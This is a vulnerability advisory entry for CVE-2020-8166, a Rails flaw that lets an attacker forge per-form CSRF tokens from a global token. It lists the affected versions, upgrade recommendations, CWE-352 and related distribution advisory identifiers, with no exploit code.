CVE-2020-8166

CVSS v2.0

5.0

Medium

Vector

AV:N/AC:L/Au:N/C:N/I:P/A:N

Name of the Vulnerable Software and Affected Versions rails versions prior to 5.2.5 rails versions prior to 6.0.4

Description A CSRF forgery issue exists that allows an attacker to forge a per-form CSRF token given a global CSRF token, such as the one present in the authenticity token meta tag. This enables the attacker to construct a per-form CSRF token for any action in that session.

Recommendations For rails versions prior to 5.2.5, update to version 5.2.5 or later. For rails versions prior to 6.0.4, update to version 6.0.4 or later.

Exploit

Fix

CSRF

Found an issue in the description? Have something to add? Feel free to write us 👾

dbugs@ptsecurity.com

Weakness Enumeration

CWE-352

Related Identifiers

ALSA-2025_16880

ALT-PU-2020-2321

ALT-PU-2021-2595

ALT-PU-2023-4268

ALT-PU-2024-7814

BDU:2025-08595

CVE-2020-8166

DSA-4766-1

GHSA-JP5V-5GX4-JMJ9

OPENSUSE-SU-2020:1993-1

OPENSUSE-SU-2020:2000-1

OPENSUSE-SU-2020_1993-1

OPENSUSE-SU-2020_2000-1

OPENSUSE-SU-2024:10589-1

OPENSUSE-SU-2024:11317-1

OPENSUSE-SU-2024:11318-1

OPENSUSE-SU-2024:11821-1

RHSA-2021:1313

SUSE-SU-2020:3036-1

SUSE-SU-2020:3147-1

SUSE-SU-2020:3160-1

SUSE-SU-2024:0103-1

SUSE-SU-2024_0103-1

Affected Products

Alt Linux

Rails

Red Os

Suse

CVE-2020-8166

Weakness Enumeration

Related Identifiers

Affected Products

References · 73